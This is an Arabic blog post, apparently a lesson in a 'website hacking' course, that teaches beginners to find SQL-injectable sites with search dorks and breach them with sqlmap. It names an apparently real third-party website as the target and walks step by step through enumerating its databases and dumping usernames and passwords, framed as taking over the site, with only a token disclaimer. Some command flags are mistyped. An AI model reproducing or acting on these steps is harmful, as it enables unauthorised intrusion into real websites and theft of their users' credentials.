شرح اداة sqlmap لاختراق المواقع مصابة بثغرة sql
اليوم هو الدرس الرابع من دورة تعلم اختبار اختراق المواقع
وان شاء سنتحدث عن اداة sqlmap لاختراق المواقع مصابة بثغرة sql
اضغط هنا للإشتراك فى قناة التيلجرام
الدرس الاول من دورة اختراق المواقع اضغط هنا
الدرس الثانى اضغط هنا
الدرس الثالث اضغط هنا
فى البداية ما هى ثغرة SQL ؟
sql injection هي من بين أكثر الثغرات تواجدا على مواقع الويب وهي ايضا ببساطة هجوم يتم فيه حقن كود يسمي SQL بتطبيق الويب "المتصفح" حتى يتم استخراج بعض البيانات من قاعدة االبيانات التي يعتمد عليها الموقع وهذا بسبب ان الثغرة تعتمد على خطأ وهوعدم معاينة ما يتم إدخاله قبل ان يتم ارساله الي قاعدة البيانات كما يمكن تجاوز نافذة authentication ايضا باستعمال هذه الثغرة
ويوجد انواع عديدة من ثغرة SQL حتى انها حوالى سيع انواع وسنشرحهم قادما ان شاء الله
كيفية استخراج المواقع المصابة ؟!
نحتاج إلى دوركات أي نهايات
للحصول على مواقع مصابة بالثغرة نذهب إلى المتصفح وندخل إحدى الدوركات التالية :-
page.php?id=
trainers.php?id=
article.php?ID=
games.php?id=
newsDetail.php?id=
staff.php?id=
products.php?id=
news_view.php?id=
opinions.php?id=
pages.php?id=
ستظهر لنا المواقع المصابة بالثغرة وللتأكد من أنها مصابة بالثغرة نذهب إلى نهاية عنوان الموقع وضع (') هذه النقطة إذا ظهرت لك خطأ أو شيء ٱخر مثل Error :You have an error in your SQL syntax فإن هذا الموقع مصاب بالثغرة
مثل هذا الموقع وهشرحلكم عليه :-
www.musculoskeletalsociety.in/page.php?id=5
كيفية استغلال الثغرة ؟!
طبعاً اذا كنت تريد مخترق مواقع مبتدأ والبحث عن مواقع مصابة وثغراتها طبعاً سيكون ابتدائك اولا باختراق مواقع sql وهذا يعتبر اسهل ثغرات لاختراق المواقع اذا كنت تحب اختراق مواقع وكشف ثغرات وتلك الاعمال وكنت مهووس بها ستتمكن من ذلك بعد تعلم ثغرة sql وطريقة برمجتها واستخدامها واختراقها ايضاً والان سنشرح لكم بالتفصيل كيف يتم اختراق ملفات الموقع واستخراج اليوزر والباسورد لكي تستطيع ان تقوم باختراق الموقع
اقدم لكم اداة sqlmap وهى افضل اداة لاستغلال ثغرة SQL واختراق المواقع المصابه بها
وهذه الاداة تعمل على نظام Termux ايضا من اجل مستخدمين الأندرويد
ولكن قبل اى شئ قم بتحميل ملف اوامر تثبيت الاداة
لتحميل أوامر تثبيت الاداة اضغط هنا
استخدام الأداة sqlmap لاختراق الموقع !!
بعد جلب الموقع المصاب وفتح الاداة نقم بكتابة الأوامر التالية :-
python2 sqlmap.py -u 🌐🌐 --dbs
طبعا بدال كلمة 🌐🌐 تقوم باضافة رابط الموقع المصاب SQL
يصبح كذلك :-
python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --dbs
طبعاً الان تم دخول الى ملفات الموقع اي اننا قمنا باختراق الموقع الان نكتب هذا الامر لكي ان تستطيع دخول الى ملف الاساسي للموقع
اكتب هذا الامر :-
python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D ❌❌ --tables
طبعاً قم بتغيير ❌❌ بكتابة اسم الملف الخاص للموقع
ثم تظهر لك ملفات الموقع الاخرى مثل المقالات الموقع او الحسابات مسجلة في الموقع وبيانات الموظفين والحسابات و كلمات السر الموقع اليوزر النيم والباسورد
تترك كل ملفات لانك لن تحتاجها فقط قم بالبحث عن ملف خاص لبيانات دخول الموقع نقوم بكتابة امر 👇
python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D NameFile -T NAMESITE --columuns
طبعا بدال اسم NAMESITE تقوم بكتابة اسم ملف الخاص للموقع الذي يحتوي على اليوزر والباسورد وعادة تكون اسمها
user site , password , user
وهكذا شبيهة لتلك الاسماء على سبيل مثال ساقوم بفتح ملف اسمها
user_name & password
هذا الامر لسحب كلمات المرور واليوزر للموقع :-
python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D NameFile -T NAMESITE --C user_name,password --dump
وبعد كتابة الامر سيظهر لك اليوزر والباسوردات الخاص بالموقع انت فقط يمكنك تغيير اسم ملفات الذي تريده ويمكنك من خلال اليوزر والباسورد اختراق الموقع بكل سهولة
كان معكم ديفل يونكس DEVIL UNEX
اتمنى ان تكونوا استفدتم من موقعنا الإليكترونى وانا اخلى مسؤليتى من اى تصرف غير شرعى
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل ماهو جديد
اتمنى ان تكونوا استفدتم من موقعنا الإليكترونى وانا اخلى مسؤليتى من اى تصرف غير شرعى
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل ماهو جديد
للإشتراك فى قناة التيلجرام اضغط هنا
ليست هناك تعليقات:
إرسال تعليق